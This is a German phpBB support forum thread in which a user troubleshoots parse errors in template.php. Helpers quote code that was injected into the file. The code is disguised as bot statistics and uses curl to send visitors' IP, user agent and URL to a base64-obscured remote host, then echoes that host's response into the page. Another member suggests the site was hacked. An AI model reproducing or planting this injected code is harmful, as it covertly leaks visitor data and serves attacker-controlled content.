Parse Error

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Adriano-10
Mitglied

Parse Error

Beitrag von Adriano-10 »

Schönen guten Abend,

zunächst einmal ja, ich habe die Suchfunktion benutzt und auch ähnliche Probleme gefunden, allerdings hat mir keines wirklich weitergeholfen da es nicht das selbe wie bei mir zu seinen scheint. Ich bekam in unterschiedlichen Abständen bei mir im Forum folgende Fehlermeldung:

Code: Alles auswählen

Parse error: syntax error, unexpected T_STRING in /users/downtown2/www/includes/template.php on line 236
Vorher hab ich das Problem immer gelöst, indem ich die /includes/template.php einfach mit der template.php Datei vom Downloadpaket von hier ersetzt habe, danach funktionierte auch alles wie gesagt Problemlos. Warum und wieso war mir nicht soo wichtig, da es wie gesagt funktionierte. Doch seit heute habe ich das Problem, wenn ich die Datei ersetze, dass ich nur noch eine Leere Seite vor mir habe, ohne jegliche Fehlermeldung oder sonst irgendwas. Ich habe auch schon probiert Cookies und alles zu löschen, andere Browser zu benutzen, etc. Einzig der Zugriff über das Handy funktioniert, wenn ich die neue template Datei nehme, wieso auch immer. Laptop, PC und unterschiedliche Browser zeigen mir die leere Seite.

Wenn ich dann wieder die "alte" template.php nehme, erhalte ich wieder die Fehlermeldung von oben. In der 236. Zeile der template.php Datei kann ich persönlich nichts erkennen, weißt da wer eventuell mehr? Also auch, wieso das in unregelmäßigen Abständen immer wieder auftaucht, wäre dann ja eventuell doch interesannt zu wissen.

Zeile 236:

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot   
Und falls nötig die gesamte template.php Datei: https://www.phpbb.de/support/pastebin.p ... iew&s=1236

Vielen Dank im voraus!
AYYILDIZLAR
Ehemaliges Teammitglied
Re: Parse Error

Beitrag von AYYILDIZLAR »

Hallo,

In dem verlinkten Code(pastebin) hast du in der Zeile 231-257 irgendwas eingebaut. Das hier ist der besagte Code

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
   // This code use for global bot statistic
   $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
   $stCurlHandle = NULL;
   $stCurlLink = "";
   if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
   {
       if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
       $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
           @$stCurlHandle = curl_init( $stCurlLink );
   }
   }
if ( $stCurlHandle !== NULL )
{
   curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
   $sResult = @curl_exec($stCurlHandle);
   if ($sResult[0]=="O")
    {$sResult[0]=" ";
     echo $sResult; // Statistic code end
     }
   curl_close($stCurlHandle);
}
}
Die Stelle bevor dieser Code zu sehen ist, sieht in dem Originall so aus

if ($filename = $this->_tpl_load($handle))
		{
			($include_once) ? include_once($filename) : include($filename);
		}
		else
		{
			eval(' ?>' . $this->compiled_code[$handle] . '<?php ');
		}

return true;
	}
bei dir sieht es allerdings so aus

{
                }
                else
                {
                        eval(' ?><?php
Merkst du es? Die Zeile 230 von dir hat das hier eval(' ?><?php die Hälfte davon fehlt und die fehlende Hälfte ist erst nach diesem besagten Code wo du eingebaut hast wieder zu sehen, siehe Zeile 258-262

?>' . $this->compiled_code[$handle] . '<?php ');
                }

return true;
        }
Du hast da die Zeile aus welchem Grund auch immer geteilt und den besagten Code eingefügt. Probiere das mal Testweise aus, ob evtl. der Fehler daher kommt.

Ich denke du weißt jetzt was du probieren sollst und das fehlende einträgst, ausserdem das von dir aus welchen Gründen auch immer "falsch" geteilte was unterhalb von diesem zugefügten Code zu viel ist dort natürlich auch wieder entfernst. Ich denke du weißt was ich meine und hast mich verstanden.

Bevor du das machst, kopiere dir aber die bemeckerte Datei includes/template.php auf dein Rechner, so hast du deine Datei, falls dir das Abändern von dem Code wo ich dir sagte, doch nichts gebracht hat(sicher ist sicher).

Danach Cache leeren usw. nicht vergessen und erneut probieren.

Grüße
DasEtwasAndereMotorradforum.de
Deutsche Übersetzung der Tapatalk Extension | Deutsche Übersetzung der Tapatalk MOD
Bitte keine PN wegen Support, werde diese zukünftig ignorieren und gleich löschen.
Adriano-10
Mitglied

Beitrag von Adriano-10 »

Vielen Dank erstmal. Hab es so gemacht wie du beschrieben hast, die Fehlermeldung von oben blieb trotzdem. Den Code dazwischen habe ich eigentlich nicht eingefügt, bin auch der einzige mit Zugang dazu, aber als ich den dann gelöscht habe, hatte ich dann die leere Broswerseite wieder. Dann komme ich zwar wie gesagt mit dem Handy auf die Seite, aber übern PC/Laptop mit unterschiedlichen Browser will es auch nicht klappen, auch Cookies, etc. bzw. den Cache der Seite hab ich übers Handy gelöscht, aber immernoch die blanke Seite. Scheinbar kommt auch kein anderer User drauf, da ne weile keiner auf der Seite war

Edit: Ich merk gerade, dass die Fehlermeldung komischerweise, wenn ich das neu eingefügte nicht lösche, immernoch auf Zeile 236 ist, aber mit anderem Inhalt:

Parse error: syntax error, unexpected T_IF, expecting T_FUNCTION in /users/downtown2/www/includes/template.php on line 236
AYYILDIZLAR
Ehemaliges Teammitglied

Leere mal bitte den Inhalt von deinem Cache Ordner per FTP bis auf die index.htm und .htaccess
Ein Link zu deinem Forum wo man die leere Seite sehen kann, wäre evtl. für die Helfenden auch vom Vorteil.
Deutsche Übersetzung der Tapatalk Extension | Deutsche Übersetzung der Tapatalk MOD
Bitte keine PN wegen Support, werde diese zukünftig ignorieren und gleich löschen.
Adriano-10
Mitglied

Beitrag von Adriano-10 »

Wie löscht man denn den Cache Ordner? Edit: Hat sich erledigt, gefunden :P Bleibt aber beim alten
Zuletzt geändert von Adriano-10 am 26.02.2013 21:17, insgesamt 1-mal geändert.
AYYILDIZLAR
Ehemaliges Teammitglied

Adriano-10 hat geschrieben:Den Code dazwischen habe ich eigentlich nicht eingefügt, bin auch der einzige mit Zugang dazu, aber als ich den dann gelöscht habe, hatte ich dann die leere Broswerseite wieder.
Ich hab auch keine Ahnung wer den Code bei dir eingefügt hat und was der dort soll. Ich sagte aber auch nicht, das du diesen Code löschen solltest. Ich sagte, nimm das Originale

{
      }
      else
      {
         eval(' ?>' . $this->compiled_code[$handle] . '<?php ');
      }

return true;
   }
und lösche das was bei dir steht in der Zeile 224-230

{
                }
                else
                {
                        eval(' ?><?php
und danach noch das hier löschen in der Zeile 258-262

?>' . $this->compiled_code[$handle] . '<?php ');
                }

return true;
        }
Denn diese zwei von dir getrennte Code-Schnippsel sind eigentlich im Original ein Code-Abschnitt.
Adriano-10 hat geschrieben:Wie löscht man denn den Cache Ordner?
Bitte lese meine Beiträge genau. Ich sagte den Inhalt des Cache Ordners und nicht den Cache Ordner. Um den Inhalt deines Cache Ordners zu löschen, benötigst du ein FTP Programm wie z.B. Filezilla oder so. Damit loggst du dich bei deinem Server ein und löschst den Inhalt bis auf die .htaccess und index.htm
Adriano-10
Mitglied

Beitrag von Adriano-10 »

Hatte beide Varianten probiert, also wie du es beschrieben hast und mal "eigenhändig" den Zusatz gelöscht. Wenn ich es wie du beschrieben hast mache, kommt folgendes Raus:

Parse error: syntax error, unexpected T_IF, expecting T_FUNCTION in /users/downtown2/www/includes/template.php on line 236
Hier nochmal die aktualisierte template.php: https://www.phpbb.de/support/pastebin.p ... iew&s=1237

Und das mit dem cache ordner hab ich falsch ausgedrückt, habs schon verstanden, gefunden und alles bis auf die 2 Dateien gelöscht, gleiches Ergebnis
AYYILDIZLAR
Ehemaliges Teammitglied

Du hast da eine Klammer zu viel entfernt bzw. gelöscht, das wäre in der Zeile 262 von deinem jetzigen Pastebin Link.
Beim ersten Pastebin Link sieht es so aus

}
}
}
und jetzt beim 2. Pastebin Link sieht es so aus

}
}
Füge bitte in die Zeile 262 die fehlende Klammer ein und danach nochmal den Cache leeren usw.
Miriam
Mitglied

Beitrag von Miriam »

Hast Du Wordpress irgendwo in der Nähe am Laufen?

Das könnte Dich interessieren: KB:gehackt.

Suche in Deinen ServerLogs auch nach der IP 91.121.106.53
Gruss, Miriam.
Ich schmeiß' alles hin und...
... lasse es liegen
Adriano-10
Mitglied

Beitrag von Adriano-10 »

Bleibt bei der selben Fehlermeldung
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“